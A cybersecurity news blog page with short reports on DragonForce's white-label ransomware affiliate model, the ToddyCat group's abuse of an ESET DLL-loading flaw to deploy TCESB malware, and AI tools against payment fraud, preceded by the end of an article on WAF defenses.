Additionally, output should be sanitized to ensure that even if unsafe input slips through, it cannot be used maliciously. Logging and monitoring are also critical, especially for API endpoints that might be vulnerable to tampering. The deployment of a robust WAF could have detected and blocked these unusual request patterns, such as command injection or OOB callbacks, thereby mitigating the threat before damage occurred.
Read more »
trending news
DragonForce Ransomware Group malware News Ransomware trending news

DragonForce Unveils Cartel-Style Ransomware Model to Attract Affiliates

The ransomware landscape is seeing a shift as DragonForce, a known threat actor, introduces a new business model designed to bring various ransomware groups under a single, cartel-like umbrella. This initiative is aimed at simplifying operations for affiliates while expanding DragonForce’s reach in the cybercrime ecosystem. 

Traditionally, ransomware-as-a-service (RaaS) operations involve developers supplying the malicious tools and infrastructure, while affiliates carry out attacks and manage ransom negotiations. In exchange, developers typically receive up to 30% of the ransom collected. DragonForce’s updated model deviates from this approach by functioning more like a platform-as-a-service, offering its tools and infrastructure for a smaller cut—just 20%. 

Under this new setup, affiliates are allowed to create and operate under their own ransomware brand, all while utilizing DragonForce’s backend systems. These include data storage for exfiltrated files, tools for ransom negotiations, and malware deployment systems. This white-label model allows groups to appear as independent operations while relying on DragonForce’s infrastructure. 

A spokesperson for DragonForce told BleepingComputer that the group operates with clear rules and standards, which all affiliates are expected to follow. Any violations, they say, result in immediate removal from the network. Though these rules aren’t publicly disclosed, the group claims to maintain control since all services run on its servers. 

Interestingly, DragonForce claims it avoids certain targets in the healthcare sector, specifically facilities treating cancer and heart conditions. The group insists its motives are purely financial and not intended to harm vulnerable individuals. Cybersecurity analysts at Secureworks have noted that this new structure could appeal to both inexperienced and seasoned attackers. 

The simplified access to powerful ransomware tools, without the burden of managing infrastructure, lowers the barrier to entry and could lead to a broader adoption among cybercriminals. DragonForce has indicated its platform is open to unlimited affiliate brands capable of targeting a range of systems, including ESXi, NAS, BSD, and Windows environments. 

While the number of affiliates joining the network remains undisclosed, the group claims to have received interest from several prominent ransomware outfits. One such group, RansomBay, is already reported to be participating in the model. As this cartel-style operation gains traction, it could signal a new phase in ransomware operations—where brand diversity masks a centralised, shared infrastructure designed for profit and scalability.
Read more »
trending news
cybersecurity news Data Theft malware trending news

ToddyCat Hackers Exploit ESET Vulnerability to Deploy Stealth Malware TCESB

 

A cyber-espionage group known as ToddyCat, believed to have ties to China, has been observed exploiting a security flaw in ESET’s software to deliver a new and previously undocumented malware strain called TCESB, according to fresh findings by cybersecurity firm Kaspersky. The flaw, tracked as CVE-2024-11859, existed in ESET’s Command Line Scanner. 

It improperly prioritized the current working directory when searching for the Windows system file “version.dll,” making it possible for attackers to substitute a malicious version of the file and gain control of the software’s behavior through a method known as DLL Search Order Hijacking. 

ESET has since released security updates in January 2025 to correct the issue, noting that attackers would still require administrative privileges to take advantage of the bug.  
Kaspersky’s research linked this technique to ToddyCat activity discovered in early 2024, where the suspicious “version.dll” file was planted in temporary directories on compromised systems. TCESB, the malware delivered via this method, had not been linked to the group before. It is engineered to evade monitoring tools and security defenses by executing payloads discreetly. 

TCESB is based on a modified version of the open-source tool EDRSandBlast, designed to tamper with low-level Windows kernel structures. It specifically targets mechanisms used by security solutions to track system events, effectively blinding them to malicious activity. To perform these actions, TCESB employs a Bring Your Own Vulnerable Driver (BYOVD) tactic, installing an outdated Dell driver (DBUtilDrv2.sys) that contains a known vulnerability (CVE-2021-36276). 

This method grants the malware elevated access to the system, enabling it to bypass protections and alter kernel processes. Similar drivers have been misused in the past, notably by other threat actors like the North Korea-linked Lazarus Group. Once the vulnerable driver is active, TCESB runs a loop that monitors for a payload file with a specific name. 

When the file appears, it is decrypted using AES-128 encryption and executed immediately. However, the payloads themselves were not recovered during analysis. Security analysts recommend that organizations remain vigilant by tracking the installation of drivers with known weaknesses and watching for kernel-level activity that shouldn’t typically occur, especially in environments not configured for debugging. The discovery further highlights ToddyCat’s ability to adapt and refine its tools. 

The group has been active since at least 2020, frequently targeting entities in the Asia-Pacific region with long-term, data-driven attacks.
Read more »
trending news
AI Artificial Intelligence Cyber Security mobile fraud News Payment Fraud trending news

Payment Fraud on the Rise: How Businesses Are Fighting Back with AI

The threat of payment fraud is growing rapidly, fueled by the widespread use of digital transactions and evolving cyber tactics. At its core, payment fraud refers to the unauthorized use of someone’s financial information to make illicit transactions. Criminals are increasingly leveraging hardware tools like skimmers and keystroke loggers, as well as malware, to extract sensitive data during legitimate transactions. 

As a result, companies are under mounting pressure to adopt more advanced fraud prevention systems. Credit and debit card fraud continue to dominate fraud cases globally. A recent report by Nilson found that global losses due to payment card fraud reached $33.83 billion in 2023, with nearly half of these losses affecting U.S. cardholders. 

While chip-enabled cards have reduced in-person fraud, online or card-not-present (CNP) fraud has surged. Debit card fraud often results in immediate financial damage to the victim, given its direct link to bank accounts. Meanwhile, mobile payments are vulnerable to tactics like SIM swapping and mobile malware, allowing attackers to hijack user accounts. 

Other methods include wire fraud, identity theft, chargeback fraud, and even check fraud—which, despite a decline in paper check usage, remains a threat through forged or altered checks. In one recent case, customers manipulated ATM systems to deposit fake checks and withdraw funds before detection, resulting in substantial bank losses. Additionally, criminals have turned to synthetic identity creation and AI-generated impersonations to carry out sophisticated schemes.  

However, artificial intelligence is not just a tool for fraudsters—it’s also a powerful ally for defense. Financial institutions are integrating AI into their fraud detection systems. Platforms like Visa Advanced Authorization and Mastercard Decision Intelligence use real-time analytics and machine learning to assess transaction risk and flag suspicious behavior. 

AI-driven firms such as Signifyd and Riskified help businesses prevent fraud by analyzing user behavior, transaction patterns, and device data. The consequences of payment fraud extend beyond financial loss. Businesses also suffer reputational harm, resource strain, and operational disruptions. 

With nearly 60% of companies reporting fraud-related losses exceeding $5 million in 2024, preventive action is crucial. From employee training and risk assessments to AI-powered tools and multi-layered security, organizations are now investing in proactive strategies to protect themselves and their customers from the rising tide of digital fraud.
Read more »
Subscribe to: Posts (Atom)